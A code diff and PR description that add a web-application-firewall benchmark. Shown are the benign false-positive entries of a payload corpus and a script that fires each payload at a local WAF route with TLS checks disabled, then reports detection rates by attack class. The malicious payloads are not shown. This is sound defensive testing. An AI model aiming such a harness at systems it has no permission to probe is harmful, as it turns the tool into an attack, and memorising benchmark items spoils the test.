+  "payload": "comment count: 42; likes: 1337"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "Mëtàl Ümläut Bänd — live in concert"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "C:\\\\Users\\\\me\\\\Documents\\\\file.txt"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "2 * 7 = 14 and 7 * 7 = 49"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "order by date, then by name please"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the cat sat on the mat"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "{\"name\":\"Acme\",\"qty\":3,\"price\":9.99}"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "search: best practices for REST APIs"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "passwd reset link requested"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NSJ9.abc"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "git commit -m 'fix the parser'"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "let x = a && b || c;"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the script kiddie movie was fun"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "100% organic & fair-trade"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "我喜欢编程 and I love coding"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "naïve approach to the problem"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "Schrödinger's cat is both"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "https://en.wikipedia.org/wiki/SQL_injection"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "regex: ^[a-z]+$ matches lowercase"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "a < b and b > c"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "<!-- this is an HTML comment -->"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "SELECT * is an anti-pattern, avoid it"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "alert: low disk space on /var"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "the password must be 12+ chars"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "Q1 revenue grew 7*7 percent (kidding)"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "DROP-DOWN menu styling"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "use UNION types in TypeScript"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "../docs/readme.md relative link"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "cmd+shift+p opens the palette"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "{{ user.name }} in a Jinja template doc"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "$HOME/.config/app.toml"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "exec summary attached"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "id: 12345, name: Acme Corp"
+ },
+ {
+  "category": "benign",
+  "kind": "benign",
+  "payload": "onclick handlers should be CSP-safe"
+ }
+]

--- a/benchmarks/waf-corpus/run.py
+++ b/benchmarks/waf-corpus/run.py
@@ -1,0 +1,70 @@
+#!/usr/bin/env python3
+"""Fire the WAF corpus at a protected zion route and measure detection + FP.
+
+Each payload is sent in BOTH vectors — query string (`?q=`) and JSON body
+(`{"q": ...}`) — and counts as *detected* if EITHER returns HTTP 400 (the WAF
+block). Detection rate is on the malicious set; false-positive rate is on the
+benign set (legit traffic that must NOT be blocked).
+
+Usage:  python3 run.py [base_url] [label]
+        base_url default https://127.0.0.1:4431 ; route /api/v1/data must have waf=true.
+Exit:   non-zero if any benign payload is blocked (a false positive is a hard fail).
+"""
+import json, ssl, sys, urllib.parse, urllib.request, urllib.error, collections
+from pathlib import Path
+
+BASE = sys.argv[1] if len(sys.argv) > 1 else "https://127.0.0.1:4431"
+LABEL = sys.argv[2] if len(sys.argv) > 2 else "zion"
+URL = BASE + "/api/v1/data"
+CORPUS = json.loads((Path(__file__).parent / "corpus.json").read_text())
+CTX = ssl.create_default_context(); CTX.check_hostname = False; CTX.verify_mode = ssl.CERT_NONE
+
+
+def fire(method, payload):
+    try:
+        if method == "GET":
+            req = urllib.request.Request(URL + "?q=" + urllib.parse.quote(payload, safe=""), method="GET")
+        else:
+            req = urllib.request.Request(URL, data=json.dumps({"q": payload}).encode(),
+                                         method="POST", headers={"Content-Type": "application/json"})
+        with urllib.request.urlopen(req, context=CTX, timeout=10) as r:
+            return r.status
+    except urllib.error.HTTPError as e:
+        return e.code
+    except Exception as e:
+        return f"ERR:{type(e).__name__}"
+
+
+by_cat = collections.defaultdict(lambda: [0, 0])
+fn, fp = [], []
+for e in CORPUS:
+    sq, sb = fire("GET", e["payload"]), fire("POST", e["payload"])
+    blocked = (sq == 400) or (sb == 400)
+    if e["kind"] == "mal":
+        by_cat[e["category"]][1] += 1
+        if blocked:
+            by_cat[e["category"]][0] += 1
+        else:
+            fn.append((e["category"], e["payload"], sq, sb))
+    elif blocked:
+        fp.append((e["payload"], sq, sb))
+
+det = sum(v[0] for v in by_cat.values()); tot = sum(v[1] for v in by_cat.values())
+ben = sum(1 for e in CORPUS if e["kind"] == "benign")
+print(f"WAF corpus vs {LABEL} — {tot} malicious / {ben} benign, both vectors → {URL}\n")
+print("── detection by class (malicious) ──")
+for cat in sorted(by_cat):
+    d, t = by_cat[cat]
+    bar = "█" * round(10 * d / t) + "·" * (10 - round(10 * d / t))
+    print(f"  {cat:9} {bar} {d:2}/{t:<2} {100*d//t:3}%")
+print(f"\nDETECTION : {det}/{tot} = {100*det/tot:.1f}%")
+print(f"FALSE POS : {len(fp)}/{ben} = {100*len(fp)/ben:.1f}%")
+if fn:
+    print(f"\n── missed ({len(fn)} false negatives) ──")
+    for cat, p, sq, sb in fn:
+        print(f"  [{cat}] q={sq} b={sb}  {p[:72]}")
+if fp:
+    print(f"\n── FALSE POSITIVES ({len(fp)} benign blocked — should be 0) ──")
+    for p, sq, sb in fp:
+        print(f"  q={sq} b={sb}  {p[:72]}")
+sys.exit(1 if fp else 0)


### PR DESCRIPTION
Closes the "no FP/FN rate measured" gap from the WAF adversarial review: a fixed, versioned corpus that turns "WAF coverage" from an assertion into a **number**.

## What
- `corpus.json` — **200 payloads**: 150 malicious across **15 attack classes** + 50 **benign-but-spicy** false-positive testers.
- `run.py` — fires each in **both** vectors (query + JSON body) at a WAF-protected route; detected = either returns 400. **Hard-fails on any benign block** (precision is non-negotiable).
- `build-corpus.py` (authoring source) + `README.md` (baseline + methodology).

## Bench #0 (v0.4.3)
| Profile | Detection | False positives |
|---|--:|--:|
| balanced (default) | **50.0%** (75/150) | **0.0%** |
| aggressive | **64.7%** (97/150) | **0.0%** |

**Zero false positives** on 50 benign payloads in both profiles — the high-precision posture the design claims, now measured. Recall is uneven: XSS 100% (aggressive), path/XXE/CRLF strong; **command injection ~33%** is the worst, plus deserialization / header-injection / internal-SSRF.

The baseline is **stable on purpose** (keep v1 for comparability). Next: plug the holes and score each pattern change as a Δ detection at constant 0% FP. A v2 grows from public corpora (OWASP CRS / PayloadsAllTheThings / fuzzdb), not invented payloads.

🤖 Generated with [Claude Code](https://claude.com/claude-code)